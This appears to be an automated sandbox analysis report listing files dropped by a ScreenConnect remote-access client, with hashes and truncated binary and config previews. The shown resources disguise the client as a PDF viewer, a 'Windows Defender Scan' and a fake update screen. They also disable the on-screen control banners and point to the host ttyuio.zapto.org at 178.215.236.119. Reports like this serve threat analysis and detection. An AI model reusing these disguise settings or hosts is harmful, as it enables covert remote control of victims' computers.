SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.862223562830496
Encrypted:	false
SSDEEP:	1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
MD5:	B1799A5A5C0F64E9D61EE4BA465AFE75
SHA1:	7785DA04E98E77FEC7C9E36B8C68864449724D71
SHA-256:	7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
SHA-512:	AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.031251664661689
Encrypted:	false
SSDEEP:	6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
MD5:	16C4F1E36895A0FA2B4DA3852085547A
SHA1:	AB068A2F4FFD0509213455C79D311F169CD7CAB8
SHA-256:	4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
SHA-512:	AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639136400085158
Encrypted:	false
SSDEEP:	24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
MD5:	9F823778701969823C5A01EF3ECE57B7
SHA1:	DA733F482825EC2D91F9F1186A3F934A2EA21FA1
SHA-256:	ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
SHA-512:	FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	601376
Entropy (8bit):	6.185921191564225
Encrypted:	false
SSDEEP:	6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
MD5:	20AB8141D958A58AADE5E78671A719BF
SHA1:	F914925664AB348081DAFE63594A64597FB2FC43
SHA-256:	9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
SHA-512:	C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.58476728626163
Encrypted:	false
SSDEEP:	3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
MD5:	AE0E6EBA123683A59CAE340C894260E9
SHA1:	35A6F5EB87179EB7252131A881A8D5D4D9906013
SHA-256:	D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
SHA-512:	1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.Override.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	464
Entropy (8bit):	4.856168973028116
Encrypted:	false
SSDEEP:	12:rHy2DLI4MWozmO5OItfU49cA8RMZRCl13dMHcJRx74:zHE4uM2xbZRpkRxE
MD5:	0DCE7F0E2345982EE860DB000753DC67
SHA1:	18E27EF165824C1B852CDFD5B3A8687BEEA132F4
SHA-256:	351BF775962568F859E12870D992A899A09C3B5A780C7DDDAA49190D8001049E
SHA-512:	B37CA7117105A48D7A476513AE207EFE8BB0717FD95A0AAB8D6AE16F76D57F392FA68BA0F0C3170E30EBEABBE1D145E4A641904676D2A0FAF27A66DCF516666E
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_Q2T}Z...5.......c...0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.L.....PDF Viewer.>Software is updating... Please do not turn off your computer!...Microsoft Windows Defender Scan

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.Override.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	93109
Entropy (8bit):	7.9618781891916806
Encrypted:	false
SSDEEP:	1536:PuVZ7zoDDZuVZ7zoDDx7zoDDx7zoDDx7zoDDx7zoDDX:PGZ3CtGZ3Cl3Cl3Cl3Cl3C7
MD5:	764E92734733E81FA036A56EA784112F
SHA1:	1CE8D8DD183C43ADB38D8F6DEFC525CC093D08EC
SHA-256:	7108F7790C144DCD4BF81E49BAE5924CC3D1050DDF697F9EAE06E2A1AD95EB37
SHA-512:	031B163839D00EBEC6D335E53CBACCD8ADB0A25417A67780BE91827C20DFD25D0CE84F37E114FD3F4D8D1A3A54A35A73088E0AB744863BF45812E61CEFE8826F
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2..C.."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8..O..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6....(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.%...0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.t...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..0..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r..i.. .....PNG........IHDR...h...z........v....PLTE.w........j.N.......2...=IDATx....b.8..`'J..J....bdX'!.:..:...?..7...]~.RG..d\..z.lK..62.6/v.....hg..w)!....ci.....).Fo......{....S7...#.(...GH...E4&.G.Q.l..N.......~..(.j....q..'..k@'...;h...(.D...~Q.t..8.uv.oT.E..j....c..v..\|..Y.:B...4y.Q$..Ed74......&5...!.u....Z.iP4..

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	50133
Entropy (8bit):	4.759054454534641
Encrypted:	false
SSDEEP:	1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
MD5:	D524E8E6FD04B097F0401B2B668DB303
SHA1:	9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
SHA-256:	07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
SHA-512:	E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C\|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..v.......B....A...a......D..c..w..K,..t...S.....v....7.6\|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........\|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	26722
Entropy (8bit):	7.7401940386372345
Encrypted:	false
SSDEEP:	384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5:	5CD580B22DA0C33EC6730B10A6C74932
SHA1:	0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256:	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512:	C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\app.config

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	4.690426481732819
Encrypted:	false
SSDEEP:	48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
MD5:	2744E91BB44E575AD8E147E06F8199E3
SHA1:	6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
SHA-256:	805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
SHA-512:	586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
Malicious:	false
Preview:	<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\nkxvqy53.newcfg

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	563
Entropy (8bit):	5.039448776106875
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpvH/vXbAa3xT:2dL9hK6E46YP7vH
MD5:	94F2B125FF2AD83490DCE247338E06CB
SHA1:	30578C28C03869B8325298B547508DDAEC36E5BE
SHA-256:	57736985015312753A6998421628C976A736B9CECBAB5EFF4BD1877055A2C03D
SHA-512:	E6672F868F80EF633B40B591DA32376C52383947C7E1A39A352BD4A737641BC02E66BCF34CB8A06486EFAD202A35BA32348E0D4AC1F482253F8389C4F676F759
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>ttyuio.zapto.org=178.215.236.119-02%2f10%2f2024%2004%3a16%3a42</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\user.config (copy)

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	563
Entropy (8bit):	5.039448776106875
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpvH/vXbAa3xT:2dL9hK6E46YP7vH
MD5:	94F2B125FF2AD83490DCE247338E06CB
SHA1:	30578C28C03869B8325298B547508DDAEC36E5BE
SHA-256:	57736985015312753A6998421628C976A736B9CECBAB5EFF4BD1877055A2C03D
SHA-512:	E6672F868F80EF633B40B591DA32376C52383947C7E1A39A352BD4A737641BC02E66BCF34CB8A06486EFAD202A35BA32348E0D4AC1F482253F8389C4F676F759
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>ttyuio.zapto.org=178.215.236.119-02%2f10%2f2024%2004%3a16%3a42</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.068776675019683
Encrypted:	false
SSDEEP:	1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
MD5:	0402CF8AE8D04FCC3F695A7BB9548AA0
SHA1:	044227FA43B7654032524D6F530F5E9B608E5BE4
SHA-256:	C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
SHA-512:	BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1373
Entropy (8bit):	5.369201792577388
Encrypted:	false
